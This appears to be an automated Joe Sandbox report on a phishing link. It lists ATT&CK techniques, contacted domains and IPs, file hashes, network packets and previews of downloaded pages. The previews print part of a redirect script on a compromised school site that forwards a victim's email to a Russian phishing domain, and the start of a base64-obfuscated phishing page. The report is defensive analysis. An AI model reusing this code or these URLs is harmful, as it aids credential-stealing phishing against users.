        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com0%Avira URL Cloudsafe
        https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/100%Avira URL Cloudphishing
        https://tafaruqueschoolandcollege.gov.bd/favicon.ico100%Avira URL Cloudmalware
        https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.html100%Avira URL Cloudmalware
        https://0hXj.diitalwave.ru/HvdnqK-qqvXHs/#X100%Avira URL Cloudphishing
        https://0hxj.diitalwave.ru/favicon.ico0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.194.137
          truefalse
            high
            www.google.com
            142.250.181.68
            truefalse
              high
              d1rsqi0l6b7evg.cloudfront.net
              18.165.220.123
              truefalse
                high
                tafaruqueschoolandcollege.gov.bd
                5.9.227.67
                truetrue
                  unknown
                  googlehosted.l.googleusercontent.com
                  172.217.19.225
                  truefalse
                    high
                    0hxj.diitalwave.ru
                    172.67.145.201
                    truetrue
                      unknown
                      clickme.thryv.com
                      unknown
                      unknownfalse
                        high
                        blogger.googleusercontent.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/#Xtest%40test.comtrue
                            unknown
                            https://tafaruqueschoolandcollege.gov.bd/favicon.icofalse
                            • Avira URL Cloud: malware
                            unknown
                            https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.pngfalse
                              high
                              https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.html#C?email=test@test.comfalse
                                unknown
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  high
                                  https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/true
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://0hxj.diitalwave.ru/favicon.icofalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.htmlfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://a.nel.cloudflare.com/report/v4?s=TybKBgNVIdxCBkWTAgN3cvFtR2YstHTHIKVnBVGvu%2BkbKjPS8VvWTOFynCRaRfMXM9JxnNipYKJoSwxmEJfPaeTP%2FweuMudZWGHPsIEO97ivhO%2BhNUkB94sSw2PWUQ%3D%3Dfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://0hXj.diitalwave.ru/HvdnqK-qqvXHs/#Xchromecache_48.3.drfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    5.9.227.67
                                    tafaruqueschoolandcollege.gov.bdGermany
                                    24940HETZNER-ASDEtrue
                                    172.217.19.225
                                    googlehosted.l.googleusercontent.comUnited States
                                    15169GOOGLEUSfalse
                                    239.255.255.250
                                    unknownReserved
                                    unknownunknownfalse
                                    172.67.145.201
                                    0hxj.diitalwave.ruUnited States
                                    13335CLOUDFLARENETUStrue
                                    142.250.181.68
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    151.101.194.137
                                    code.jquery.comUnited States
                                    54113FASTLYUSfalse
                                    35.190.80.1
                                    a.nel.cloudflare.comUnited States
                                    15169GOOGLEUSfalse
                                    18.165.220.123
                                    d1rsqi0l6b7evg.cloudfront.netUnited States
                                    3MIT-GATEWAYSUSfalse
                                    IP
                                    192.168.2.7
                                    192.168.2.27
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1572611
                                    Start date and time:2024-12-10 18:12:00 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:browseurl.jbs
                                    Sample URL:https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:14
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal76.phis.win@18/12@18/10
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 173.194.222.84, 172.217.17.46, 217.20.58.101, 142.250.181.42, 216.58.208.234, 172.217.17.42, 172.217.19.234, 142.250.181.106, 172.217.19.202, 142.250.181.74, 142.250.181.138, 172.217.17.74, 172.217.17.35, 23.218.208.109, 13.107.246.63, 52.149.20.212
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com
                                    No simulations
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:dropped
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    Reputation:low
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:downloaded
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    Reputation:low
                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (31865), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):68490
                                    Entropy (8bit):5.817456297563251
                                    Encrypted:false
                                    SSDEEP:1536:adkIeelTKUn4lBSO3h9zZp1P36MxJPdkIeelTKUn4lBSO3h9zZp1P36MxJyfN:adk9mTKUC5/dk9mTKUC5K
                                    MD5:D14C9F5E7FC2502C5F7701AB0A9805DD
                                    SHA1:5883CF264D5880763A00DBF62ACB7CEBEDEA781D
                                    SHA-256:8D268280CA94CBC80CAA535E058882172303BC08A02719575A8A651ADBCDA6C3
                                    SHA-512:C45CF12C95BB818C92DCB19102F9E1FF711ADAFFE6B5240CE42ABB15D7E6AB6E78D856FD93344790F9A017F6640D0024F4BEA8170E169616951B4AA32CCEFCBE
                                    Malicious:false
                                    Reputation:low
                                    URL:https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/
                                    Preview:<script>....if(atob("aHR0cHM6Ly8waFhqLmRpaXRhbHdhdmUucnUvSHZkbnFLLXFxdlhIcy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyOjpiZWZvcmUgew0KICAgIGNvbnRlbnQ6ICIiOw0KICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsNCiAgICB0b3A6IDA7DQogICAgbGVmdDogMDsNCiAgICByaWdodDogMDsNCmJvdHRvb
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text
                                    Category:downloaded
                                    Size (bytes):1736
                                    Entropy (8bit):4.6083403316544445
                                    Encrypted:false
                                    SSDEEP:24:DYkCo5vQvAaLK9Vx0QtxVdzrK9QmR9QGsIeWA9bQG0lCBj3yhcjIUyd4NM:d5da+5NtVzGMBP0UyCNM
                                    MD5:E521998C3A226A136DB855A4C1719EB6
                                    SHA1:CBADC6F047DBE716A1EA9D6BE5953E3B7A1586FB
                                    SHA-256:0E4BCF7DFB3B6D5207C2135165CBF052F188883DD06C32ED45F45866C2732EB5
                                    SHA-512:C8362BD883A6CB760A7A8BDBFDFC742E9355E4DD99A4A0992C7F5657270D069CB2C43B0245C6FDAB77E3EC655248B7F1AC4085A024B4A35934073A9DF0765BA4
                                    Malicious:false
                                    Reputation:low
                                    URL:https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.html
                                    Preview: <!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>56ufgi7oyh8</title>. <script>. document.addEventListener('DOMContentLoaded', function() {. setTimeout(redirect, 100);. });.. // Function to handle redirection. function redirect() {. var email = getParameterByName('email');. var redirectUrl = "https://0hXj.diitalwave.ru/HvdnqK-qqvXHs/#X";.. if (email) {. redirectUrl += encodeURIComponent(email);. console.log("Redirecting to: " + redirectUrl);. } else {. console.log("No email provided, cannot redirect.");. }.. window.location.href = redirectUrl;. }.. // Function to get URL parameters. function getParameterByName(name, url = window.location.href) {. name = name.replace(/[\[\]]/g, '\\$&');. var
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):16
                                    Entropy (8bit):3.5
                                    Encrypted:false
                                    SSDEEP:3:H+rYn:D
                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                    Malicious:false
                                    Reputation:low
                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAmUtkekjBN4PhIFDTcwqTA=?alt=proto
                                    Preview:CgkKBw03MKkwGgA=
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 3396 x 1920, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):87859
                                    Entropy (8bit):7.046777034066421
                                    Encrypted:false
                                    SSDEEP:1536:k4iIwz9HmGeKV5FrZuUDPA3Ae3ItuR30nAVO4P88D6s:piIkGZ+ZsJ4YR30ePHD6s
                                    MD5:A4D9107960AE4E4F79E6A36DF931EF5D
                                    SHA1:35704C698FCCD795B8F19DA76672A72C00422857
                                    SHA-256:FBBBC78E85DFA4F2B390E6DC2F3850D0F5247D16B5FD525093331572AA79AE84
                                    SHA-512:2C7FB7F198B0B141DD5B2B72ECB8B6E00514B70DFDE8CF6161988A5BB4F26C72BEED5CB59EC9E80BB2651016999D7DBB1CEE73F18AF7A982A0F3AC73E9B02465
                                    Malicious:false
                                    Reputation:low
                                    URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png
                                    Preview:.PNG........IHDR...D.........3;+.....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...!.. ..0..X..I.................@g............;3............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13..
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 3396 x 1920, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):87859
                                    Entropy (8bit):7.046777034066421
                                    Encrypted:false
                                    SSDEEP:1536:k4iIwz9HmGeKV5FrZuUDPA3Ae3ItuR30nAVO4P88D6s:piIkGZ+ZsJ4YR30ePHD6s
                                    MD5:A4D9107960AE4E4F79E6A36DF931EF5D
                                    SHA1:35704C698FCCD795B8F19DA76672A72C00422857
                                    SHA-256:FBBBC78E85DFA4F2B390E6DC2F3850D0F5247D16B5FD525093331572AA79AE84
                                    SHA-512:2C7FB7F198B0B141DD5B2B72ECB8B6E00514B70DFDE8CF6161988A5BB4F26C72BEED5CB59EC9E80BB2651016999D7DBB1CEE73F18AF7A982A0F3AC73E9B02465
                                    Malicious:false
                                    Reputation:low
                                    Preview:.PNG........IHDR...D.........3;+.....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...!.. ..0..X..I.................@g............;3............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13..
                                    No static file info
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 10, 2024 18:12:49.697094917 CET49671443192.168.2.7204.79.197.203
                                    Dec 10, 2024 18:12:50.900187969 CET49671443192.168.2.7204.79.197.203
                                    Dec 10, 2024 18:12:51.025233984 CET49674443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:12:51.025399923 CET49675443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:12:51.181466103 CET49672443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:12:53.306435108 CET49671443192.168.2.7204.79.197.203
                                    Dec 10, 2024 18:12:57.351756096 CET49677443192.168.2.720.50.201.200
                                    Dec 10, 2024 18:12:57.915832043 CET49677443192.168.2.720.50.201.200
                                    Dec 10, 2024 18:12:58.165549994 CET49671443192.168.2.7204.79.197.203
                                    Dec 10, 2024 18:12:58.712338924 CET49677443192.168.2.720.50.201.200
                                    Dec 10, 2024 18:13:00.212341070 CET49677443192.168.2.720.50.201.200
                                    Dec 10, 2024 18:13:00.697324038 CET49674443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:13:00.697345972 CET49675443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:13:00.909933090 CET49672443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:13:02.199328899 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:02.199369907 CET44349707142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:13:02.199611902 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:02.199832916 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:02.199842930 CET44349707142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:13:03.197582006 CET49677443192.168.2.720.50.201.200
                                    Dec 10, 2024 18:13:03.849493980 CET44349699104.98.116.138192.168.2.7
                                    Dec 10, 2024 18:13:03.849802017 CET49699443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:13:03.899571896 CET44349707142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:13:03.947406054 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:04.106353998 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:04.106369019 CET44349707142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:13:04.107589006 CET44349707142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:13:04.107664108 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:04.111298084 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:04.111392975 CET44349707142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:13:04.159547091 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:04.159559011 CET44349707142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:13:04.189748049 CET49709443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:04.189794064 CET4434970918.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:04.189918995 CET49709443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:04.190210104 CET49710443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:04.190260887 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:04.190311909 CET49710443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:04.190432072 CET49709443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:04.190440893 CET4434970918.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:04.190673113 CET49710443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:04.190682888 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:04.207205057 CET49707443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:13:05.932851076 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:05.933506966 CET49710443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:05.933538914 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:05.934690952 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:05.934761047 CET49710443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:05.935120106 CET4434970918.165.220.123192.168.2.7
